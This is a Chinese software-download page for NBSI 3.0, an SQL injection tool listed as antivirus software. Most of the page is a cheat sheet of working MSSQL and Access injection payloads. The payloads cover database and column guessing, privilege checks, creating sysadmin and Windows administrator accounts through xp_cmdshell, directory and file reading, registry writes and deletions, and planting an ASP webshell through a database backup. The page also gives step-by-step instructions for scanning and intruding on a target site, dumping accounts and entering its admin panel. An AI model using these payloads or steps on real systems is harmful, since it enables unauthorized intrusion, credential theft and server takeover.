首页
手机版
您的位置:首页 > 软件下载 > 杀毒安全 > 杀毒软件 > NBSI注入工具免费版

NBSI注入工具免费版NBSI注入工具免费版

软件大小:980KB

软件语言:简体

用户评分:

版本类型:v3.0

授权方式:免费版

软件官网:www.tfxy.org

更新时间:2020-12-21

软件分类:杀毒软件

运行环境:Win7/Win8/Win10

nbsi3.0纯净版是一款专业的网站漏洞检测工具,使用该软件用户可以快速的检测网站漏洞,检测结果精准,速度快,可以快速的提高该行业人员办公效率!

软件介绍

nbsi纯净版(nbsi网站漏洞检测工具)是一款专业的网站漏洞检测工具,使用该软件用户可以快速的检测网站漏洞,检测结果精准,速度快,可以快速的提高该行业人员办公效率!它是一款由VB语言编写的网站漏洞检测工具的名称,ASP注入漏洞检测工具,特别在SQLServer注入检测方面有极高的准确率。

软件特色


本工具功能非常强大,希望同学们用于正途

别去做一些偷鸡摸狗的令人可耻的事情

由VB语言编写的网站漏洞检测工具的名称

ASP注入漏洞检测工具

特别在SQLServer注入检测方面有极高的准确率

软件功能

1.判断是否有注入

;and1=1

;and1=2

2.初步判断是否是mssql

;anduser>0

3.判断数据库系统

;and(selectcount(*)fromsysobjects)>0mssql

;and(selectcount(*)frommsysobjects)>0access

4.注入参数是字符

'and[查询条件]and''='

5.搜索时没过滤参数的

'and[查询条件]and'%25'='

6.猜数据库

;and(SelectCount(*)from[数据库名])>0

7.猜字段

;and(SelectCount(字段名)from数据库名)>0

8.猜字段中记录长度

;and(selecttop1len(字段名)from数据库名)>0

9.(1)猜字段的ascii值(access)

;and(selecttop1asc(mid(字段名,1,1))from数据库名)>0

(2)猜字段的ascii值(mssql)

;and(selecttop1unicode(substring(字段名,1,1))from数据库名)>0

10.测试权限结构(mssql)

;and1=(SELECTIS_SRVROLEMEMBER('sysadmin'));--

;and1=(SELECTIS_SRVROLEMEMBER('serveradmin'));--

;and1=(SELECTIS_SRVROLEMEMBER('setupadmin'));--

;and1=(SELECTIS_SRVROLEMEMBER('securityadmin'));--

;and1=(SELECTIS_SRVROLEMEMBER('diskadmin'));--

;and1=(SELECTIS_SRVROLEMEMBER('bulkadmin'));--

;and1=(SELECTIS_MEMBER('db_owner'));--

11.添加mssql和系统的帐户

;execmaster.dbo.sp_addloginusername;--

;execmaster.dbo.sp_passwordnull,

username,password;--

;execmaster.dbo.sp_addsrvrolemembersysadmin

username;--

;execmaster.dbo.xp_cmdshell'netuserusername

password/workstations:*/times:all

/passwordchg:yes/passwordreq:yes/active:yes/add'

;--

;execmaster.dbo.xp_cmdshell'netuserusername

password/add';--

;execmaster.dbo.xp_cmdshell'netlocalgroup

administratorsusername/add';--

12.(1)遍历目录

;createtabledirs(pathsvarchar(100),idint)

;insertdirsexecmaster.dbo.xp_dirtree'c:\'

;and(selecttop1pathsfromdirs)>0

;and(selecttop1pathsfromdirswherepathsnot

in('上步得到的paths'))>)

(2)遍历目录

;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--

;inserttempexecmaster.dbo.xp_availablemedia;--获得当前所有驱动器

;insertintotemp(id)execmaster.dbo.xp_subdirs'c:\';--获得子目录列表

;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:\';--获得所有子目录的目录树结构

;insertintotemp(id)execmaster.dbo.xp_cmdshell'typec:\web\index.asp';--查看文件的内容

13.mssql中的存储过程

xp_regenumvalues注册表根键,子键

;execxp_regenumvalues'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion\Run'以多个记录集方式返回所有键值

xp_regread根键,子键,键值名

;execxp_regread'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion',

'CommonFilesDir'返回制定键的值

xp_regwrite根键,子键,值名,值类型,值

值类型有2种REG_SZ表示字符型,REG_DWORD表示整型

;execxp_regwrite'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion',

'TestValueName','reg_sz','hello'写入注册表

xp_regdeletevalue根键,子键,值名

execxp_regdeletevalue'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion',

'TestValueName'删除某个值

xp_regdeletekey'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'删除键,包括该键下所有值

14.mssql的backup创建webshell

usemodel

createtablecmd(strimage);

insertintocmd(str)values('');

backupdatabasemodeltodisk='c:\l.asp';

15.mssql内置函数

;and(select@@version)>0获得Windows的版本号

;anduser_name()='dbo'判断当前系统的连接用户是不是sa

;and(selectuser_name())>0爆当前系统的连接用户

;and(selectdb_name())>0得到当前连接的数据库

16.简洁的webshell

usemodel

createtablecmd(strimage);

insertintocmd(str)values('');

backupdatabasemodeltodisk='g:\wwwtest\l.asp';

请求的时候,像这样子用:

http://ip/l.asp?c=dir

软件安装

1、下载文件找到“SWebVulnsScan.exe”双击运行,进入软件;

2、进入软件,出现下图界面,如下图;

3、系统设置包括了开始域名、域名的总数、日志等;

4、CMS识别包括了配置、导入域名、导入、当前识别、识别的结果、CMS程序等;

5、漏洞扫描包括了导入域名、域名总数、通用的CMS漏洞、通用组件漏洞等;

6、目录扫描包括了域名,导入、指纹识别、急速扫描、精确扫描等;

软件使用

步骤01:下载并运行NBSI3.0,双击NBSI.exe应用程序,即可打开NBSI操作主窗口,如图3-16所示。如果知道一个注入点,就可以在注入地址处填入注入点的URL,否则将需要对入侵网站进行扫描。在“工具栏”中单击“网站扫描”按钮,即可打开“网站扫描”窗口,如图3-17所示。

步骤02:在“注入地址”中输入要入侵的网站地址,选择“快速扫描”单选项,单击“扫描”按钮,即可对该网站进行扫描。如果在扫描过程中发现注入漏洞,则将漏洞地址及注入性的高低显示在“扫描结果”列表中,如图3-18所示。

步骤03:在“扫描结果”列表中单击要注入的网址,即可将其添加到“注入地址”文本框中,如图3-19所示。单击“注入地址”文本框后面的“注入分析”按钮,即可打开“注入分析”窗口,如图3-20所示。

步骤04:勾选post复选框,在“特征字符”文本区域中输入相应的特征字符,单击“检测”按钮,即可对该网址进行检测,其检测结果如图3-21所示。待检测完毕后,如果“未检测到注入漏洞”单选项被选中,则该网址就不能被用来进行注入攻击。

步骤05:在“已猜解表名”栏目中单击“猜解表名”按钮,即可打开“SI提示信息”提示框,如图3-22所示。

提示

这里得到的是一个数字型+Access数据库的注入点,ASP+MSSQL型的注入方法与其一样,都可以在注入成功之后去读取数据库的信息。

步骤06:单击“确定”按钮,即可对选定的表单猜解。待猜解完毕之后,将会在“已猜解表名”文本框中显示出数据库的表名,如图3-23所示。

步骤07:在选中要猜解的数据表后,单击“猜解列名”按钮,即可得到该数据表所包含列的相关信息,如图3-24所示。在勾选要猜解列名前面的复选框后,单击“猜解记录”按钮,即可得到该列名中包含的详细信息,如图3-25所示。

步骤08:在NBSI主窗口的“工具栏”中单击“扫描及工具”按钮,即可进入“扫描及工具”窗口,如图3-26所示。

步骤09:将前面扫描出来的标识为“可能性:较高”的网址复制到“扫描地址”文本框中;勾选“由根目录开始扫描”复选框,单击“开始扫描”按钮,即可将可能存在的管理后台扫描出来,把扫描结果显示在“可能存在的管理后台”列表中,如图3-27所示。

一般情况下,扫描出来的网站管理后台不止一个,此时可选择默认管理页面,并利用破解出用户名和密码进入其管理后台。如果不能成功登录,则需逐个测试扫描出来的管理后台。

软件测评

NBSI(网站安全漏洞检测工具,又叫SQL注入分析器)是一套高集成性Web安全检测系统,是由NB联盟编写的一个非常强的SQL注入工具。经长时间的更新优化,在ASP程序漏洞分析方面已经远远超越于同类产品。NBSI分为个人版和商业版两种,个人版只能检测出一般网站的漏洞,而商业版则没有完全限制,且其分析范围和准确率都所有提升。

利用网站程序漏洞结合注入利器NBSI可以获取会员账号和管理员账号,从而就可以获取整个网站的Webshell,然后可通过开启Telnet和3389端口来攻击该网站服务器。

nbsi网站漏洞检测工具(nbsi3.0)是一款功能非常强大的安全检测工具;它包括了注入分析、网站扫描、getwebshell、扫描、工具等栏目,并且可以支持进行PHP、ASP的网站漏洞的安全检测,使自己的服务器不被工具,可更好的保护自己;软件的操作简单,使用方便,界面清晰,完全免费,需要的朋友赶快将nbsi网站漏洞检测工具(nbsi3.0)下载来使用试试吧

更新日志

修复http发包API错误问题

优化字典,删了10万无用字典

显示状态可是设置提示那些状态码或者不提示那些状态码

特别说明

下载地址

下载错误?【投诉报错】

NBSI注入工具免费版

高速下载

其他下载地址:

大家都喜欢

  • 电脑软件
  • 手机软件
更多>
返回顶部
返回顶部